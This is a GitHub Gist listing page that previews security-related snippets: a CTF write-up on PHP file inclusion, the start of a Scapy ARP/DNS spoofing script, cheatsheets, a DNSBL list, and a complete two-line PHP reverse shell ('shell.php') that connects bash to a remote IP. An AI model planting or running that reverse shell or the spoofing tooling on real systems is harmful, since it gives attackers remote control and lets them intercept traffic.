Skip to content

Instantly share code, notes, and snippets.

View testuser-aaa's full-sized avatar

testuser-aaa

3 followers · 18 following
View GitHub Profile
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@anvbis
anvbis / pwntools-cheatsheet.md
Last active August 5, 2025 08:43
pwntools-cheatsheet.md
@davidlares
davidlares / arp.py
Last active July 22, 2024 09:24
MITM ARP/DNS Spoof with Scapy
#!/usr/bin/python
from scapy.all import *
import threading
import argparse
import pdb
import sys
import os
class ARPPoisoning(threading.Thread):
@x0nu11byt3
x0nu11byt3 / elf_format_cheatsheet.md
Created February 27, 2021 05:26
ELF Format Cheatsheet

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@nikitastupin
nikitastupin / fingerprint.js
Created February 8, 2021 12:21
fingerprint.js
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}
@adgooroo
adgooroo / gist:aae14456ba53abff8b4c3f45cdb01e80
Last active April 6, 2023 21:17
Список DNSBL List 2023
0spam.fusionzero.com
2.0.0.127.b.barracudacentral.org
3y.spam.mrs.kithrup.com
abuse.earthlink.net
abuse.org
abuse.rfc-ignorant.org
accept.the-carrot-and-the-stick.com
access.redhawk.org
all.rbl.kropka.net
all.s5h.net
@richarddun
richarddun / gist:1bb11d32cafc394efbcb8f4a8b6cb130
Last active January 30, 2025 19:33
scapy script to send http requests
#!/usr/bin/env python
"""
Script to open TCP connection and send 1 HTTP GET request containing
a specific string, and header
Usage:
./http.py <IP_of_target>
There is only one mandatory argument, which is the target IP address.
@MyITGuy
MyITGuy / acct_lockout_with_time.ps1
Created November 15, 2014 20:43
PowerShell: Locked Out Accounts with Lockout Time
Search-ADAccount -LockedOut | Get-ADUser -Properties lockoutTime | Select @{Name="sAMAccountName";Expression={$_.sAMAccountName.ToUpper()}},@{Name="LockoutTime";Expression={([datetime]::FromFileTime($_.lockoutTime).ToLocalTime())}} | Sort LockoutTime -Descending
@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");